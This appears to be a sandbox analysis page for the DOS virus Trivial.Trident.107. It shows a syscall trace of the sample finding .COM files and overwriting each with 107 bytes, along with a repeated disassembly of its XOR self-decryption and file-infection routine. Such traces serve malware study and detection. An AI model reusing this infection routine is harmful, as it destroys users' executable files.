Sample viewer

vx.netlux.org/Virus.DOS.Trivial.Trident.107

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:59:24.510300664Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x175
0x12a63: mov cx, 0x59
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x165
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:59:24.514031477Z 78 PC: 12a7a | Find first file
2018-12-17T22:59:24.521623282Z 61 PC: 12a84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:59:24.529166852Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.536806326Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.540438065Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.556281137Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x175
0x12a63: mov cx, 0x59
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x165
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:59:24.559303224Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.563594038Z 61 PC: 12a84 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:59:24.570906848Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.578505917Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.584630682Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.59468925Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x175
0x12a63: mov cx, 0x59
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x165
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:59:24.597715419Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.601603009Z 61 PC: 12a84 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:59:24.609682913Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.617327066Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.621827105Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.631983972Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x175
0x12a63: mov cx, 0x59
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x165
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:59:24.634759827Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.639424706Z 61 PC: 12a84 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:59:24.651502672Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.662020286Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.665499983Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.675770016Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x175
0x12a63: mov cx, 0x59
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x165
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:59:24.67828698Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.681649556Z 61 PC: 12a84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:59:24.688849135Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.699779754Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.706123828Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.721806542Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x175
0x12a63: mov cx, 0x59
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x165
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:59:24.724930693Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.727689075Z 61 PC: 12a84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:59:24.735283733Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.742901938Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.745727392Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.754282606Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x175
0x12a63: mov cx, 0x59
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x165
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:59:24.757019092Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.760112921Z 61 PC: 12a84 | Open file (Filename = 'PAH.COM')
2018-12-17T22:59:24.767436589Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.775268583Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.779540531Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.788445429Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x175
0x12a63: mov cx, 0x59
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x165
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:59:24.792256769Z 79 PC: 12a7a | Find next file
2018-12-17T22:59:24.795562525Z 61 PC: 12a84 | Open file (Filename = 'TEST.COM')
2018-12-17T22:59:24.803238391Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:59:24.807040896Z 64 PC: 12a9a | Write file or device (Write 89 bytes on handle 5)
2018-12-17T22:59:24.81037017Z 62 PC: 12a9e | Close file
2018-12-17T22:59:24.81932636Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x175
0x12a63: mov cx, 0x59
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x165
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:59:24.823062248Z 79 PC: 12a7a | Find next file